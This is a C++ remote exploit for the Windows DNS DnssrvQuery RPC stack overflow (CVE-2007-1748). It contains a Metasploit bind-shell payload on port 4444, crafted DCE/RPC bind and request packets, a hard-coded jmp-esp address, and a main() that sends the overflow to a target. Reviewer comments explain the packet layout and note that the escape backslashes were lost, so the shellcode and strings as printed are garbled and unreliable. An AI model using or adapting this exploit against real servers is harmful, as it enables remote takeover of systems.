# Title : MS Windows DNS DnssrvQuery Remote Stack Overflow Exploit
# Published : 2007-04-15
# Author : devcode
/*
* Copyright (c) 2007 devcode
*
*
* ^^ D E V C O D E ^^
*
* Windows DNS DnssrvQuery() Stack Overflow
* [CVE-2007-1748]
*
*
* Description:
* A vulnerability has been reported in Microsoft Windows, which can
* be exploited by malicious people to compromise a vulnerable system.
* The vulnerability is caused by a boundary error in an RPC interface
* of the DNS service used for remote management of the service. This can
* be exploited to cause a stack-based buffer overflow via a specially
* crafted RPC request. The DnssrvQuery function is the one affected by this
* stack overflow.
*
*
* Hotfix/Patch:
* None as of this time.
*
* Vulnerable systems:
* Microsoft Windows 2000 Advanced Server
* Microsoft Windows 2000 Datacenter Server
* Microsoft Windows 2000 Server
* Microsoft Windows Server 2003 Datacenter Edition
* Microsoft Windows Server 2003 Enterprise Edition
* Microsoft Windows Server 2003 Standard Edition
* Microsoft Windows Server 2003 Web Edition
* Microsoft Windows Storage Server 2003
*
* Tested on:
* Microsoft Windows 2000 Advanced Server
*
* This is a PoC and was created for educational purposes only. The
* author is not held responsible if this PoC does not work or is
* used for any other purposes than the one stated above.
*
* Notes:
* <3 Metasploit for releasing it yesterday, only had time to look at it
* this morning. Also props to Winny Thomas.
*
* There are two ways we can embed shellcode. One is to pad each byte of
* the shellcode with '\' (0x5C) and jmp EBX. The other way is the one Winny
* used, which is to pass in the shellcode as the third argument of the RPC
* function and jmp EDX after incrementing it appropriately. I used the latter :)
*
* ^^ #pen15, InTeL, D-oNe and ps. St0n3y is nub kthxbye
*
*
*/
#include <iostream>
#include <windows.h>
#pragma comment( lib, "ws2_32" )
/* win32_bind - EXITFUNC=thread LPORT=4444 Size=342 Encoder=PexFnstenvMov
http://metasploit.com */
/*
 * Metasploit-generated bind-shell payload: it listens on TCP 4444, which is
 * what the "Check shell on port 4444" message in main() refers to.  main()
 * copies this array with sizeof(), i.e. the 342 payload bytes plus the NUL
 * terminator = 343, and that is where the 1663-byte uszPacket size comes
 * from: 1320 (copy offset) + 343 == 1663.
 *
 * NOTE(review): the backslash of every "\x.." escape was lost when this page
 * was extracted ("x6a" is printed where the source had the escape), so the
 * literal as printed is three characters per intended byte.  As shown it
 * neither encodes the payload nor has the sizeof() that main() relies on.
 */
unsigned char uszShellcode[] =
"x6ax50x59xd9xeexd9x74x24xf4x5bx81x73x13x76xd2xab"
"x1fx83xebxfcxe2xf4x8axb8x40x52x9ex2bx54xe0x89xb2"
"x20x73x52xf6x20x5ax4ax59xd7x1ax0exd3x44x94x39xca"
"x20x40x56xd3x40x56xfdxe6x20x1ex98xe3x6bx86xdax56"
"x6bx6bx71x13x61x12x77x10x40xebx4dx86x8fx37x03x37"
"x20x40x52xd3x40x79xfdxdexe0x94x29xcexaaxf4x75xfe"
"x20x96x1axf6xb7x7exb5xe3x70x7bxfdx91x9bx94x36xde"
"x20x6fx6ax7fx20x5fx7ex8cxc3x91x38xdcx47x4fx89x04"
"xcdx4cx10xbax98x2dx1exa5xd8x2dx29x86x54xcfx1ex19"
"x46xe3x4dx82x54xc9x29x5bx4ex79xf7x3fxa3x1dx23xb8"
"xa9xe0xa6xbax72x16x83x7fxfcxe0xa0x81xf8x4cx25x81"
"xe8x4cx35x81x54xcfx10xbaxbax43x10x81x22xfexe3xba"
"x0fx05x06x15xfcxe0xa0xb8xbbx4ex23x2dx7bx77xd2x7f"
"x85xf6x21x2dx7dx4cx23x2dx7bx77x93x9bx2dx56x21x2d"
"x7dx4fx22x86xfexe0xa6x41xc3xf8x0fx14xd2x48x89x04"
"xfexe0xa6xb4xc1x7bx10xbaxc8x72xffx37xc1x4fx2fxfb"
"x67x96x91xb8xefx96x94xe3x6bxecxdcx2cxe9x32x88x90"
"x87x8cxfbxa8x93xb4xddx79xc3x6dx88x61xbdxe0x03x96"
"x54xc9x2dx85xf9x4ex27x83xc1x1ex27x83xfex4ex89x02"
"xc3xb2xafxd7x65x4cx89x04xc1xe0x89xe5x54xcfxfdx85"
"x57x9cxb2xb6x54xc9x24x2dx7bx77x99x1cx4bx7fx25x2d"
"x7dxe0xa6xd2xabx1fx00";
/* 50abc2a4-574d-40b3-9d66-ee4fd5fba076 v5.0 */
/*
 * DCE/RPC v5.0 bind PDU (ptype 0x0B), 72 bytes (frag_length 0x0048), sent
 * first so that the server accepts the DNS management interface named above.
 * Line 1: common header; line 2: max xmit/recv fragment sizes and one
 * presentation context; line 3: the interface UUID above, with its first
 * three fields stored little-endian; lines 4-5: the transfer syntax, the
 * standard NDR syntax 8a885d04-1ceb-11c9-9fe8-08002b104860 version 2.
 * main() sends sizeof() - 1 bytes, excluding the NUL terminator.
 * NOTE(review): escape backslashes were lost when this page was extracted,
 * so "x05" stands for the single byte 0x05.
 */
unsigned char uszDceBind[] =
"x05x00x0Bx03x10x00x00x00x48x00x00x00x01x00x00x00"
"xD0x16xD0x16x00x00x00x00x01x00x00x00x00x00x01x00"
"xA4xC2xABx50x4Dx57xB3x40x9Dx66xEEx4FxD5xFBxA0x76"
"x05x00x00x00x04x5Dx88x8AxEBx1CxC9x11x9FxE8x08x00"
"x2Bx10x48x60x02x00x00x00";
/* DnssrvQuery: opnum 1 */
/*
 * Head of the DCE/RPC request PDU (ptype 0x00, pfc_flags 0x83 = first and
 * last fragment plus an object UUID present).  frag_length is 0x067f = 1663,
 * which is exactly sizeof(uszPacket) in main(): the request is sent as one
 * fragment, with alloc_hint 0x0657 = 1623 = 1663 minus the 40-byte header.
 * Context id 0 and opnum 0x0001 follow, then the same interface UUID as in
 * uszDceBind, and from line 3 onwards the start of the stub data.  main()
 * copies these bytes (sizeof() - 1) over a packet pre-filled with 0x5C, so
 * everything a network sensor sees is a bind to that UUID followed by a
 * single 1663-byte opnum-1 request consisting mostly of 0x5C bytes.
 * NOTE(review): escape backslashes were lost when this page was extracted.
 */
unsigned char uszDceCall[] =
"x05x00x00x83x10x00x00x00x7fx06x00x00x01x00x00x00"
"x57x06x00x00x00x00x01x00xa4xc2xabx50x4dx57xb3x40"
"x9dx66xeex4fxd5xfbxa0x76x10xc2x40x00x02x00x00x00"
"x00x00x00x00x02x00x00x00x44x00x00x00x94xfax13x00"
"xccx04x00x00x00x00x00x00xccx04x00x00";
/*
 * 18 bytes of stub data that main() places at packet offset 1302.  Unlike the
 * other copies, main() copies sizeof() without subtracting 1, so the NUL
 * terminator also lands in the packet, at offset 1320 -- which is then
 * overwritten by the uszShellcode copy that starts at that same offset.
 * NOTE(review): escape backslashes were lost when this page was extracted.
 */
unsigned char uszDceEnd1[] =
"x41x00xb8xc0x40x00x57x01x00x00x00x00x00x00x57x01"
"x00x00";
/*
 * 70-byte block that main() places at packet offset 1006.  Every meaningful
 * byte is interleaved with 0x5C, the same byte main() fills the whole packet
 * with, so the block is: the little-endian address 0x77E14C29 (4 bytes),
 * then 29 x 0x42 and finally 0xFF 0xE2 (see the two comments below).
 * The address is hard-wired to the user32.dll of Windows 2000 Advanced
 * Server SP4, which is why the header lists only that build under
 * "Tested on".  main() sends sizeof() - 1 bytes of this array.
 * NOTE(review): escape backslashes were lost when this page was extracted,
 * so "x5Cx29" stands for the two bytes 0x5C 0x29.
 */
unsigned char uszJmps[] =
/* 0x77E14C29 - jmp esp user32.dll (Windows 2000 Advanced Server SP4) */
"x5Cx29x5Cx4Cx5CxE1x5Cx77"
/* inc edx, jmp edx */
"x5Cx42x5Cx42x5Cx42x5Cx42"
"x5Cx42x5Cx42x5Cx42x5Cx42x5Cx42x5Cx42x5Cx42x5Cx42"
"x5Cx42x5Cx42x5Cx42x5Cx42x5Cx42x5Cx42x5Cx42x5Cx42"
"x5Cx42x5Cx42x5Cx42x5Cx42x5Cx42x5Cx42x5Cx42x5Cx42"
"x5Cx42x5CxFFx5CxE2";
/*
 * Print the banner and the command-line usage text to stdout.
 *
 * The literals are reproduced exactly as this page prints them: their
 * escape backslashes were evidently lost in extraction (the "n" and "tt"
 * runs were once "\n" and "\t\t"), and they are not repaired here.
 */
void usage( ) {
    fputs("nttMicrosoft Windows DNS RPC Stack Overflown", stdout);
    fputs("ttt(c) 2007 devcodenn", stdout);
    fputs("usage: dns.exe <ip> <port>n", stdout);
}
/*
 * Entry point: connect to <ip>:<port>, send the DCE/RPC bind, read (but do
 * not parse) the reply, then send one 1663-byte request built from the
 * arrays above at fixed offsets.  Returns 0 after the final recv, -1 on any
 * argument, Winsock, connect, send or first-recv failure.
 *
 * Packet layout (see the memcpy calls below): uszDceCall at 0, 0x5C fill,
 * uszJmps at 1006, uszDceEnd1 at 1302, uszShellcode at 1320 up to 1663.
 *
 * NOTE(review): none of the offsets or copy lengths are checked against
 * sizeof(uszPacket); the layout only holds when the arrays have exactly the
 * sizes the header comments give.  As this page prints them, with the escape
 * backslashes stripped, sizeof(uszShellcode) is roughly three times 343 and
 * the copy at offset 1320 would write far past the end of uszPacket (a stack
 * overrun in this program itself, undefined behaviour).
 */
int main( int argc, char **argv ) {
WSADATA wsaData;
SOCKET sConnect;
SOCKADDR_IN sockAddr;
char szRecvBuf[4096];
/* 1663 == frag_length announced in uszDceCall == 1320 + sizeof(uszShellcode) */
unsigned char uszPacket[1663];
int nRet;
if ( argc < 3 ) {
usage( );
return -1;
}
/* Winsock 2.0; WSACleanup() is never called on any return path below. */
if ( WSAStartup( MAKEWORD( 2, 0 ), &wsaData ) != NO_ERROR ) {
printf("[-] Unable to startup winsockn");
return -1;
}
sConnect = socket( AF_INET, SOCK_STREAM, IPPROTO_TCP );
if ( sConnect == INVALID_SOCKET ) {
printf("[-] Invalid socketn");
return -1;
}
sockAddr.sin_family = AF_INET;
/* argv[1] must already be dotted-quad; an inet_addr() failure is not checked. */
sockAddr.sin_addr.s_addr = inet_addr( argv[1] );
/* atoi() gives no error indication: a non-numeric port silently becomes 0. */
sockAddr.sin_port = htons( atoi( argv[2] ) );
printf("[+] Connecting to %s:%sn", argv[1], argv[2] );
nRet = connect( sConnect, (SOCKADDR *)&sockAddr, sizeof( sockAddr ) );
if ( nRet == SOCKET_ERROR ) {
closesocket( sConnect );
printf("[-] Cannot connect to servern");
return -1;
}
printf("[+] Sending DCE Bind packet...n");
/* sizeof - 1: do not send the string terminator.  A short send (nRet less
 * than the length) is not detected, only SOCKET_ERROR. */
nRet = send( sConnect, (const char *)uszDceBind, sizeof( uszDceBind ) - 1, 0 );
if ( nRet == SOCKET_ERROR ) {
closesocket( sConnect );
printf("[-] Cannot sendn");
return -1;
}
/* Consume the bind reply; its contents (bind_ack vs bind_nak) are never
 * inspected, and szRecvBuf is not NUL-terminated or used afterwards. */
nRet = recv( sConnect, szRecvBuf, sizeof( szRecvBuf ), 0 );
if ( nRet <= 0 ) {
closesocket( sConnect );
printf("[-] Recv failedn");
return -1;
}
/* Pre-fill with 0x5C, the byte uszJmps is interleaved with. */
memset( uszPacket, 0x5C, sizeof( uszPacket ) );
/* Request header + start of stub data (terminator excluded). */
memcpy( uszPacket, uszDceCall, sizeof( uszDceCall ) - 1 );
/* Terminator excluded here too. */
memcpy( uszPacket + 1006, uszJmps, sizeof( uszJmps ) - 1 );
/* No "- 1": the terminator is copied to offset 1320 and overwritten by the
 * next memcpy, so it is harmless but inconsistent with the two copies above. */
memcpy( uszPacket + 1302, uszDceEnd1, sizeof( uszDceEnd1 ) );
/* No "- 1": relies on 1320 + sizeof(uszShellcode) == 1663 exactly; nothing
 * here verifies that, so a payload of any other size overruns uszPacket. */
memcpy( uszPacket + 1320, uszShellcode, sizeof( uszShellcode ) );
printf("[+] Sending DCE Request packet...n");
nRet = send( sConnect, (const char *)uszPacket, sizeof( uszPacket ), 0 );
if ( nRet == SOCKET_ERROR ) {
closesocket( sConnect );
printf("[-] Cannot sendn");
return -1;
}
printf("[+] Check shell on port 4444 :)n");
/* Result of this final recv is ignored; it only waits for the server. */
nRet = recv( sConnect, szRecvBuf, sizeof( szRecvBuf ), 0 );
closesocket( sConnect );
return 0;
}